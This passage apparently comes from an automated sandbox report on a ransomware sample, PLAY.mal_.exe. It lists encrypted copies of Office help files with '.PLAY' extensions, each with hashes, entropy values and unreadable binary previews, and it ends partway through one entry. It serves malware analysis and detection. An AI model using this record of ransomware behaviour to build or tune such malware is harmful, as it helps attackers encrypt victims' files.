        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft Help\MS.EXCEL.16.1033.hxn.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1416
        Entropy (8bit):7.8565102046837
        Encrypted:false
        SSDEEP:
        MD5:E21585C8037F3880A3F717C837CC8C95
        SHA1:F1243A6FCBA7D10FE7A4DD0534BC8276BF06E8CC
        SHA-256:2CC0DBD13DDB30C2DC6B3615C6B3339D3D24E253DADF95DC852D042E8D71C404
        SHA-512:7F26BAC26484F758BF0B3F82DE54D94917F16CE2CECB4C6D2C116A9D28BC6E417459EB20BF87CD02A66C88ABEB7A708DD9040375808B1CD8BC5A3F4FE7FABD9F
        Malicious:false
        Preview:=....p.g..)].."(.V..[q...!F P.bp....V.._s_.......).k..,\..E:~....b..........<.R.l.......h.Y.~x.!.S_1..$a......6.*.i.....8(./..iB....o!....7X.pR......z...e.8.{15...;.YB..<v.f.Nt.7@..a.T..qW...k.....5iYs..#. 8i...i&\:.i....t...~..E.@B...a.h-8...@_V.:.....(..._....M.v.p...../9.$..n..c .....y.`.e..........}..uu.2U....!.H....;..H^...`a......T..U.|.!.I>............................C&2.>...^..E.8.'.*....x.,.....x{.Ak."@......v..f....b....7`..h.?^.>...[....1l..5.L.3.p....!v*4...........).c....n....T.....L....&.PS..K..]<E>,-..<...U!q+.9..B..s.&!.:.:_..\...........!.B..(.|f..n......o.z....d..R..J..@..7..p.v.........!.3.q.0...}..V%.....8.".;.......'....p.zZ...........o....|C.3...*..,j......fm.5.M.....`.....*...l<-.x~.......jt.0.k.........j.sVp...r.V...2.~.}...O(..R.#..;...r.=.5.,-..fq.u....m..K3,cM.H.x...|#m6.o1...j...K7A*.5.....$...n./......mYW...|...~......$.z.QGs.Eg;B.]!.>.6t.o..b.D..........-.EI..].^.F]..d.-..x.J..[.p..n....Dn..Ba...v....F..V.&z

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft Help\MS.GRAPH.16.1033.hxn.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1416
        Entropy (8bit):7.841130070235249
        Encrypted:false
        SSDEEP:
        MD5:E219A576C0A9C0C1D669F8718EFBB7B7
        SHA1:A0D6C5CEEB5CFEC95C48A2B7A025540A7FB96E48
        SHA-256:B9110A1BBE1D7B50AD4D1486F95B74153AF70EAF69988E60E8DFB31F1CFCF030
        SHA-512:A46B3DD6AA3606FB48440EA54F2620380E644BB9FE6F61831E6EBD59E77FF433B6E5E01806E5BE6886E5A89FBCED898A273E6C7B89706DC85470879CC3DBF567
        Malicious:false
        Preview:#}l>("d.]..ns6T..a..'.$.A.4_...P,.i_....n....U..g..}.A..!c.....O....{.............h..N..P;..#..Di]b.........2........Li...zD..%Z..6......?.....i.W.l.....b..5.%J.!..r..^..,R....s......67{.^...@L.....UY.t..E...V.....p~G.a...MC...&.C..c.Sj..(.|t./j.A_.....r........@@IN....a$......j-_}.NW.w.f..._S].m....nv.9....Y./...P.7.,x.LW..Q$...n.\Q..d...T..U.|.!.I>..........................n\...T...@......7j...`.~e.7....l&.G....r....+.......9....:.......`[..{......~.....lg....4..U....B..$r....U....Y.].t..@.~....(X......>..ThT6...2.........jB.=.AO.wY....'.W..`u"c.p..p|O.X...S`T..C.t`...8....[....*i.r3.t...y..i....@.I....0..Ff.@*~..S..t.d.X+...(H../1.eR.t...#24..m....6.'.~n.'C...M..Lb...\..E.>O_P..\i5.`...h......B.;.Mq..Z.....H~d.V..3.^.q....g............_..h..t..@.."..A.<.0<R.f:Z.........w.v.-...8........!.Z7czy.Nn..t....-#..2.S..._...../..3.....2T.4.s"{.{.=:.P%.lt.n......;Y.M..j..@...G.....).M3.i.L.....j.NbFwA..t..F.G....^^....x....~M.$Q..w#...=......

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft Help\MS.GROOVE.16.1033.hxn.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1432
        Entropy (8bit):7.866838944759726
        Encrypted:false
        SSDEEP:
        MD5:BAB86621F32E0DB18BE8020F03D6E246
        SHA1:D8AAE3995AD2120DA9B61F63025B6E8D2F1C4A5C
        SHA-256:67865B78B95916A00A0BAB57938A07E9B47C297434C9A54624F3685EE73F5A7B
        SHA-512:729D03D2E6139CD16A95BF0C89E2F5860B9788F6D632674D40C9230B1D9F815BEAD17AB45AE51098C93D64575BC277F67ABFFE3063E3D325229904AED5B5C900
        Malicious:false
        Preview:R.gN............4:}?[g.Ru.2.....O..C..C.....l..|..=Z.0....+Tp).66.~..Oh....t]...)..^+(k.%.o....6....~.6..z._.......D.s..3..t^WX 4oX..p'....8..X....'.%S..1+.:..SP4.......x..N....c..9..@Im.e...u.t1...<..[9z...*3..._L...7{.M.fh+..q.@..u.r.X..~..i....L.WrNtFI.............-.....^..........X...dS...$Mt.W.O.[#lg..8wA....p6."R....xb......|...."....-L6.Y...T..U.|.!.I>..........................2~0......L.2.....`.a..r....1.@..o.>.?..,...Z.U..;|h..bD._.+.GK.h..^).../3.qj_..6B.a.=..@.....`E.`B..^.B<.bfx%..[...........Z....>1i4.}x.....F....[/..............x...c.lG.Q.5U."'..lu.-J.k.J.l.t..E....U-.>.v..../u...o.`?.!.. ._F.:.........W=....oq_.=..[A(.e..x.....~T...W..4..Ww<...;.:c....f.Kv_.L..3....i.@......&,..T..8../.-. .R. .......g..O....;.J/.a.*w....dZp...^.c.L..x.m..7z.u..?..S.-c......kc._...e..|..+.V.D........+....S"...6C.e.N1.......#A..... .!7...8m.Ks..=.4.....6.f....kA.*.<.......JT..O..g.........DN...BN.....N.Sty.~..P..t...,.d....5...u{....o

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft Help\MS.LYNC.16.1033.hxn.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1416
        Entropy (8bit):7.84915129563854
        Encrypted:false
        SSDEEP:
        MD5:673C90DD58D23B33652BBB84B599B388
        SHA1:4C92C2DA91679FE74A384694C687E261D76B514B
        SHA-256:88432D16F8EF2A7BBDEBD949D85527745575CE124AE9F9790DECF8265EFEF167
        SHA-512:409C35B29AD37FAA5A12BF39EA168A8015D6B788D835CBE873530D2E3CE95AD9A978E23B0B8DFBC9D8023A668F42C5FA6C9A54EECB5345C3FA1E45A4A25BA0DD
        Malicious:false
        Preview:..gB..s.g....Z...".Ji..;fY!I.J.55E..'..Gaj..C....2..p6.../K..H<~j..I.N..jP&-.`S1.Kh@.%.??.....q.[k..U. q......k.3Q..mA..V.[B....[.i........FpE...H..`.m..q.Tj...P04.e...lCb<........D]h.5.-..z)..J.5,.T.......;.....@Q.......S...r:..F.B......w.Tz...G.#.`&d....*.;.ju..I.....$....G.. .>.".......?.D`7...^E....xc.7.Q.K.!P)..z..J.}6O..:....T..U.|.!.I>...........................>.N...D.uI....t.fz....)#..C].9.7:zq.p7.`!e.%#v.?I= ..F.U..8.l.@.u....>^.......f.L..J.n...[.....e.<.B.J.l.5..C..m......i....?|i..a@...g...j.9..4..W,..G........2.P./.....Bi.....$M.X..n....[k.d1N._C...+gVI.H....J.|.a....BT%....J.1.M!....d.....[.3...@.6.pn...O....}.E..`...<..,.Set.....vyL.x.#.2..1'...g..flA....F.$Pa{KJ....%..]r.3..A8.....A.....a....\.P..)..|....}^...4.G.!.....\.]d.....x.=...|.4...9>a.0...._...|......$!d.h_..U.@.buK>65......7.[.@mo`7z..2I'Z...R/u.a.d"M.:-{.F'.E.......$.9.E..^`..x...7.J.P...w.i.|.+.......}y.Q.B..T..g....as.N.o....9..*;..g....]i.........<.5.....

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft Help\MS.LYNC_BASIC.16.1033.hxn.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1448
        Entropy (8bit):7.84535243496695
        Encrypted:false
        SSDEEP:
        MD5:B5DC987F47270CBF940AFDD4E7677330
        SHA1:35AEBEB316E9DF3D888965B004C79DB6004195EB
        SHA-256:4BD3E8E6763E2549ED561617E9C7A87468270FC60759AC969BA28F47DE0AF280
        SHA-512:4777AB0003CD565F095F5ECCAC7C9ACFA5C2FBB8DFDA0375560DB30BF38A663C3CBAD39D6C5C0B06DF92C09AF6156EDE06E5426A2828B0FF53EA90E0922FE6CC
        Malicious:false
        Preview:.a.w..e']N.....B.FMt.y<....'$.F.>.....z..f.K.c'....\X%.....Ad.J.........M...t...N.|.>...S.........1.".zj...y.!/ZF..*......>....4.5...:...g..,5.S.tG...D.$...aF..........!.{..8!<.E..U....~X..7....F .....O/.j.B.....<.>.V.....5F}a..9N...Gi.3....WQ.+..L..&..<1.....T.+...^o.U40..Sk.h..7.!.f...x..vs@..,#..e...q ..".......P.@....wZ.T...*.......o....xU[c.S..im..i.~.yjg#0JAn...T..U.|.!.I>............................W}e..&y..}.G..H...m...H+E%:..e..Sg....K.=.....6..t..P.R.....w.HA.'S...).7.R..6]h..WIr..[$.E..L?e..L`CO]..KE.W....NF.b[.B..B..O......9.o."x...r. ..BM..M..:.Z.....g.f.T...4.lnwr....A.{..\.85w.U<..[....=.M9..{4Ey......j.&..5{..?w3~.../j...A....O2.....3.}..g[.c."y.1.gt.U.$V8.....>..KWvx...M...L^..]%@...........9.i...|P.~.v.$..lz..*9g.....OI....z..F..;..(.;......:E!t.~.T| ...V.b....H.8B(8L...HhZFl...<..'..q..%..)........39P...E.hX..b..3Vf...v1...djQ.c. q.9...YV..8.]~........;8C..Q..G..?C..u..2.r.w..9...'..v}.X.@O..$I...].A.....\.o..%,.A~<.M...t

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft Help\MS.LYNC_ONLINE.16.1033.hxn.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1464
        Entropy (8bit):7.865413327899979
        Encrypted:false
        SSDEEP:
        MD5:37FA42AB4AA141958271002A9AC7BA51
        SHA1:7001DF19C4E85AC44A5F30B322511D1845AE02D8
        SHA-256:EE7E124AA1DAEF18D3F60E55EFACE027B907409B6603F4EC1F00F8C250D12548
        SHA-512:931F08872AF8F6D38529B4A8A1DC39A365C4081157CEA77C63341E4E8158EA7E28EABA393F73B1203C2513BE47AE22E99E31F818CCFDB9349E9CD4B38336CD07
        Malicious:false
        Preview:...-..7..o.2...Q?.O...z.&Y.......%."i.e.j}. .."Qo..<C....h..k..B.<....g1Fi9.m..-.y..P......^..K5...y.s.U..dG.......>C.o.. .v..S.k.......8......Qx~Y._NbF...H..z>.......A/.M.. ..~..2>.e.,............zX:G.W....O8.V.<..Y.!..>........#..y.=.B.)i)5=.<....."(&...mt.S..._........w...2._gt...P.._..F.o..oe.~.l..........w5y.>.....n......c.....coQAQ/..e.&.x...K.1..\f..M3[..$.U9<..=Y.,.v.W.....T..U.|.!.I>..........................9...a&.fH>.zc.-V%=.4......;..H.....Q.H...N0.u.....\..Dh..4.N..).r..R.:'CGV..z%...i6{......l...%.......*...By..L...T.,j.Jn]"ULi.H.........i.a+V.:.\...CE.&......H...p|...O..E{..$....|...E..!S.v...-..>.*.(..F..n.e....X.h2.7...f.J(....).z..a.O#...........x....p.f......U......nS.o.bC._..dp.....rg......YM.[h..q....k.5...kV?..4...MT.J..Pl..+<f....5.....6X....z....g.......BL..Z...I.a.Hq....p.B+....Z.....d_J)...[...^...L.@A..F.m09.C.....I....4 .:._..S.~..l5.\}.I....rL.."......L....QS"d....-.....h..T....]....,..HY......]....]..E..r.

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft Help\MS.MSACCESS.16.1033.hxn.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1448
        Entropy (8bit):7.8519896024483025
        Encrypted:false
        SSDEEP:
        MD5:13D892EDD653D472EF976F9240AB5257
        SHA1:FC099D08CA2D61738A0714B4AF7F16456A0307D8
        SHA-256:3019D8BE6857263AC8F3439D87A24C6CC8490A4474BA86633B3EE4757A0D4763
        SHA-512:6084D7D0F7AF9B12AFF6F22D1A693B6CEE0D653D9A1844E621B8773EDA507B6CE847AA303B092C3D76631F2DEB28BBBA02C3B0C5AC89CA3774226AE9C5AEB808
        Malicious:false
        Preview:...Z.O.r>U)...lL......).L...)`..'.S..RCIkU......6.).G....T=..*}..............<&./b..e....'..).D......W..y.....].p-...Ta..a....&...>....ZIw......&......p..K..b.8]...A.m1.....v.o.........i.14....)..S.....k$.X..P..Sg..........N.J....>L..t....l.X.C.......k...w..$.d..G.*..D\...@.h....aG...."X......UF...a.DP.8`|.....jf.u..W1v..4t..CZ...S.w.O.....>./....Yct...QVU....<.v...T..U.|.!.I>..........................ii..E..E|.e}.%.>/...V.O;.$..<...m.%.Nh.L...&.;X.].^.T..-...X\.E..x2U.>.....g.m.Y...[S:..*&..................+..._.o6......osMJ.u..J~........O...]w2..9..0.W.\.W~..'z-........B.\...v..{.....`....m.G..e...9.....C...X.v......Tr....{.V.Y......V...)...t...~$.......JjTq,b.....@<......y..b..)..6.=...;..h.25......(".6.JQ...E.m..X.,C.m....../...O~.z..pD....07.`NJ.......0#V.q.GbX.X.K...$?.A]...|7.....Z.~h.c.H........../[...ZqD.Sy......9WdP.EP..jjw.HH.DgF...:nS....FHq.....k....q....~..Mt.....gw....>27......<.. J..bp9R....QQv..7@..1&......DTb.Y..*.G..D...j

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft Help\MS.MSOUC.16.1033.hxn.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1416
        Entropy (8bit):7.844357465702022
        Encrypted:false
        SSDEEP:
        MD5:898137E80B75A3663063101ABFCCEC9D
        SHA1:E3C5FEE8C48B33FDDA9BC0DE7DE7433196D68284
        SHA-256:F326992CDDB8FEB97E6B12C69D8A096B8884DC214A235C501CD6D2CF1B788B15
        SHA-512:52305B1FB12D1004846373A227E83C65A24FD69B29AB343DD2FAA525BA174AE0473E26872FBDF529658D9649FFE65361C5850789E84A37CEAD4EE9A0B46A278B
        Malicious:false
        Preview:.Z.g....Q.9"... k.et.M.....\O..v..(H.l%qj.#9..|..Z.~....K..K..WK.i.....y.....2U.G.h..5/hj../.&.0..Pf..jR..E+@....&G....u$....".jW....3.....F.X...qh.V........2....vz.d.!.%hP.g....x........A...b..5......@......g...7...P.....cMAt..`...p. \...~..b.h...q....y..$.&..'A.....8*`.[.Z...e3..d..l..l...f.~...6...J.n.}..g..m`t3.../g.\..x...T...J. T....T..U.|.!.I>...........................6_:`.........M..w...na07.C..4.E..s..J^..sS?..:6...j..P.....9...`..W....SN-...P.P..P|&0..s.........>O.~d.6.....2VOk....&..`..._..%...Kqia.Y,....L..&/.............a."eL.M..H......%...l......Zo..t.oW.....\U.e...a(=..i%4....t.g.....t...ux..=.R...n.^kr..Y....5..XB..@....D..O....*.fV.i.F.l."h".cvvhyN.1.1.C.......N~^..<7..p.h#..$..oP.//s....9...Z..fKv;J........3b.....q.....[z.x.d.......~..#...u..-...V~...Q....."..z.r..'..5u.g...s..0O..h...#..=.C..W)...._*.k n~!W.P.".>...w...p....]...R.{..5........z..t:.X....eB..q..]....Tf.+.L.6..@..w4.o..Ei.w..1.X.Ul..........H.d..r...b.C.

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft Help\MS.MSPUB.16.1033.hxn.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1416
        Entropy (8bit):7.8592683158986505
        Encrypted:false
        SSDEEP:
        MD5:2EB290C53EFB17A0BAAF369BD996E107
        SHA1:59C8DB839B743BA25397F03BFB8A21379D028688
        SHA-256:A9DEC77AB887AF3F0046FA0D0AE63682F07A3FA510BAE48C9A3B35E00596FDE9
        SHA-512:75EC1302756E9FD846C53C8FEC1005971FBC3AFF174C63AB7C6563700802B60F2CAAA8D687AF301D1412D2BD2D6501760F1FDA5A85CD9566D683E0F231B2951E
        Malicious:false
        Preview:.F9S5...{m.g......"..&...&..7@.u.....x.?DAK.....}F......h.....[|3.h...3.x.wR....oD9..M.]..\....zQ.m.f..6\.J.B.'..m1...*0.....}..G.f.ib.^m.6.q.%>.O.....K..!:..b....q..G.9z...S7....a..."..9.GXt..Re...39.5.{-.i....a.$oc<....T.^7[.M9..*.B.IG...uWB........~...mm.,ik.xe.{..A..m...R....S..`W..xOo;Qi.$......A.P. ......^8D l..).B..3.k..3...T..U.|.!.I>..........................O.....w......@......0.0...9].l...U6.X.q$.8_..Q.....^O..R..}............|...[j.X...v}..,....`d........a.q"...x....l.~Od.E...w..C.]9D.6....D..%e|`|3....n.t...`.........(.4?.V....Y(.....#=.1.G....z.N..?RP.D9.Q...e......f.=.B....b.!2..R]...]..r....n.p$H..:......._....ap*......v.....Soi...{.RW.....o...oZD..(...F....T..C.)>..11.....H..G..EZ.H...>Rc1...f.7Zb.'._..X... n.e.Y..+..A.w.E.vacHI...U;.'..b...|tp...y........:..E.....S6zh.H.{...";.@%4..."..)...q.7!.kh......0.>e.D..d.z...'.'.Ag.....s.z...r-......Dph....M.O.x$.w.....:...f.2%Y...T..C.m>J~.&#....Pn...'...w..._.$f....T.ik

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft Help\MS.ONENOTE.16.1033.hxn.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1432
        Entropy (8bit):7.814722829396364
        Encrypted:false
        SSDEEP:
        MD5:947AD8EE0630C35CEA67A3646807E22A
        SHA1:4C2ABC1257E52AB7984783C4F666E375F63E1BAB
        SHA-256:EEE0C02EEB4BB6CDD3A227E40D6D5AA46D7F9BFAB42B919C915E8B4F75BA8637
        SHA-512:8BB41539078D9BF81538E129ADEEDC5A31974E0487530F0F06C8458472E4A457AA4E51BB22576871B4B1EB72B8D96AAEB939DB85A854F613851AFCA286D00BD3
        Malicious:false
        Preview: t..V...]TX...U.@...L..t.-j..............f../.....b....6"H..........64h.1;6....&.f*1...O..]7...+..,~..?Fy...S.r.`.......@....W.G.1Pm.o.%^B...J....M.....C4..VlO..@..".....$...T.W.p.#..S._.J.tE.n...}..l@.~..B...c.......7.b._..s...+.xv.?R~u'...j.._.4...(;...Ut..s.x...Mh.[`........%......f.....+1S.@......P.T\K........z..1...2Mf.7.4..Nj;'.)c......A`.D...T..U.|.!.I>..........................r......G..Njk............_'...#b...G%.2..wNg..j1.A......9.(8W.....(..EP.w....%.X.X.K~..q+S.D...._.|@.>.%Y7...".0X.....$]KWJ...o7.!....ov.gg......Ju...I..}+?...|...+...2..%._i.Cz.......ez.YR{./""....j....=...Zg....m.....z..\K..E....u.&...(N....W}......s.bC....mU.k..Z.<.O......l.~^=}.*.h...+&t...q....DT..j@&..p..x].{...*..AA4j-E..E...x..g.)....@H....w..BeOI.J%.0.x^6z<......1..4..V.M6{..E{...!%..DNI D.Y....f+.Y.Sw@S...H.....-@.m.+....tp6...Hn=U...s+..M...Y.z..y.IN0#......"A~....R..%..Ym..z..^4._..)....#....n...`K.fu....v.p..A..,CL.j.l.;r.F.....A{.:.~x.:..

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft Help\MS.OUTLOOK.16.1033.hxn.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1432
        Entropy (8bit):7.84646828989208
        Encrypted:false
        SSDEEP:
        MD5:750842DC44EB331CB41A2BD2C6D11047
        SHA1:EA6394203DF446FA85C6D80B0F4AB8F7E301CE5C
        SHA-256:54E18A0E1D5085709D6E1D02A606E3F3936696414365799DDD5084D874160BAF
        SHA-512:D687C5346B56852E78A818C85FD7A0E36EBBAD0C9CE43FE6D24C3D4CABC1F06A8F2F1C3D0C476A70620E4446A647509410A17710B409D31C057E27DEEEDD4F39
        Malicious:false
        Preview:N.F.4.....[-...x...Q..]H7K;.2....+"8I]Z..x{~....0.Az|...3...["c@.]aT3.M.%....\.....ZS_.[.....n...$".K\....d.(.VH|^.G..*.r?qq.. [..O.Z...... ...4I;...r|..bG.x..F.qp?o.]..L.....iW<.._eK3........>....R..5+x.M.!$.8b...H.-.o...m[.j..Y..m.,...l....@$V2..}...........i..M4+..;.F..1..a.6.G\.,.wH@..gs.(d........9.IbO....w.......v....5..<..jw.Sq..T;h:x.S.....T..U.|.!.I>..........................H9.I..QI.].....?........P.A.LY...Y.3.d@.....F...^.r{.*n.=x0...d..O..3..H...$}..\...IQ...._u+.X...L..F S.Q6(m.=.K..C].Dg....!.<.R..../......K...j.........k.@..ZB.......]...........d.pq.X.-o.f.m....Z+.Mq........."}.[Y.}51'C.......;_.......93.:.6.r...ds.t...........d.G.....?....z .Tl[.......:..:\.Z`.J..../.!y.O.1...5.FVB..R>.`W......>.>.b.!...H)y.........{.....|...........K..-.....t.....mH..q..v=..E.io.z.t..M.....A.x.m7`......l3]...f .k%..}>$ G...C"......g.5U..N...........o.....n2m..M.h....lPS......jN5.....|{.......lF..$BR.x~}......f63.mX....2+.F6...

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft Help\MS.POWERPNT.16.1033.hxn.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1448
        Entropy (8bit):7.85870039886199
        Encrypted:false
        SSDEEP:
        MD5:B4504428EBBEFBA508C3F94F0DEED264
        SHA1:16C994460BE88B2BBC3C1A89A6A1CCCF52B39572
        SHA-256:E2D17C8BD49FA993832904B01DD3221909774D60B8353CD3747B18F2E55C88C0
        SHA-512:14AF57C074A58C07AADF1012A4018727DE74CF07FEAF0EC46A1561DC7F0E30A9221395FF310816C868D2287979B16B2CDB298261CDF009BE93F4A493FD871110
        Malicious:false
        Preview:!.vg..[..C%...<}.....e&R."(/...U...a$.."....C.N..at9Y.U..;........H...=Yh....(v1..[S}.^7J..?...O.(...,.&.q.i.b.....x../|...P....V.<.6..5.A.....{._.#..6......z...5b..U......{.E)Cgy......F@..i.r.........r..4..(..M.U.....jO...)..4...n.........L..a<....~......u#L.,..T......s..X.n";.}eu@.s.5.@...P...B..8'.....9..{.....+...Q$..H..].......v.I>}6.p.]J-..M.=....;.U....T..U.|.!.I>..........................C.*..|.~]w.H=s..-.U.bi.(.-.!.Q..D..<...g..:f....w#.....v%u.:.H.'....f.e.%..X...........J....Mf..&{.....0c{..].9.3..Y..C........P~yY.F...=..Ip.....8....B...7..U.....(.(L.B.......w.G..c>..q*.K.j....t.9.Nx5....Bf.....a.'.oa...;^A...."...,L)...<..~.l....!....G..{kr..qS....*v3z...."U+=.4..Mp .:..r..|'.8]`....j...3.H...<.Q<...%......sq0*...i ,.o..Q.....$z+kt...[..>..!........./....t._.......5...D>....?.....Tfe.....d....o<..6.|......o...t:G.V...d...>.3...j...xu.]...o.=..1.<W.)[...... {.Eo.k..p...~.u...I....`....a...C.J.r..ZuJ3....u.17......=.w

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft Help\MS.SETLANG.16.1033.hxn.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1432
        Entropy (8bit):7.87652127413153
        Encrypted:false
        SSDEEP:
        MD5:E8B4FF3E8EE6335D4D3FD044772DCF4F
        SHA1:31BA60430A500DBD6CFB4594A23D090728C23BC2
        SHA-256:5818BDF05F17A902734F351E7CB9CF95E7ACA6AD397CE3B6FB3CF9985CFFF9A0
        SHA-512:8A36530EE31BCEB91AF3B071E3D4D5C8F75C625588ECCB28722916F0A15D47F82CD314B0A24CC47405C7030A4A641D7BCA1972DCE6BA7DBE26A870DAD627EAD8
        Malicious:false
        Preview:eJ.LR.U.Dz#..R[......l.%1MA4..#G........Sf`{....U@'.+..L......#.P.g.N.px.Kp..7.G}N;7R@e...)D..o..X.N.....2..#..s.2..@o.t.,...:..|{.o"q...Eqp..z...H............_l../P....l..X.n.y6W=.:...N.b..zoya..O....I....h......RA.^....[.............k.\TQ.V.c.k.......iN.H.}.y.`........F.^or...N..9.d...-....G.D.3.:+?..E.....<.14....(.R..5.w.U..pA.X..W...l4....XG.. .....T..U.|.!.I>...........................m........R..J.6..k{.iI....u..m....8X....'..2.._C1..q...O.gu...Q..c_..ZJ...{X~._S.H.|.*.K....o.<,5....y7?...=,...?:.`.)9..g.\....g.....x:.:.8.^.xF... .q. 4......*If..l.....J+'.....p}v!.(.3G.....=Ag5?..=t.<.Dv..E...h)..e.]..Sv.dh$..-W..^...zM5.w....:.fnLu....T.@.K.m,}O.i<......{/]D...."...%..R....M....@.mF..r9v.h..f....i.......iF..9...C.He.7j...F........w!...1q.a}._..[.".9]I.bP.X..F}..$..$..e..~............E..J.K_k.AR...o....v1d.#}(^.s..+i.....r.I......h)..M.....K_......[.0........OO.|..?..t....8.@]7c.V.}..2y`....=...K9....a....f.D..".A....u...u-..V.[hp;..

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft Help\MS.SKYPEFB.16.1033.hxn.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1432
        Entropy (8bit):7.859536442968976
        Encrypted:false
        SSDEEP:
        MD5:6E9FDAC0A8A1FDED48604D7493ECD4A5
        SHA1:9CA6D88B2027BA3DB40908B7DEAD652E9F5A5683
        SHA-256:F6B7DB2A8A15425FBC9D8DA3C9F73399463AF66BBCD869C640F1B33746C8CF93
